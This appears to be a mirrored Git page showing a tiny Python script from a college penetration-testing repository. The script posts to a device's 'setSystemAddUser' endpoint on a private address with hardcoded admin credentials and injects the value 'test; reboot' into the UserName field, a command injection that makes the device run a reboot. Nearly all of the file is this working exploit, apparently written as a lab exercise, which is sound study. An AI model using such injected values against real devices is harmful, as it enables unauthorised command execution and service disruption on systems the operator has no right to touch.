mirror of
https://github.com/bvanroll/college-pentesting.git
synced 2025-08-28 19:42:41 +00:00
6 lines
260 B
Python
6 lines
260 B
Python
from connections import *
|
|
|
|
|
|
|
|
print(postReq("http://192.168.1.219/setSystemAddUser", "admin", "Azerty123", {"ReplySuccessPage":"advanced.htm", "ReplyErrorPage":"errradv.htm","SessionKey":"1543011420", "UserName": "test; reboot", "Password":"aaaaaaaaaaaaaaa"}))
|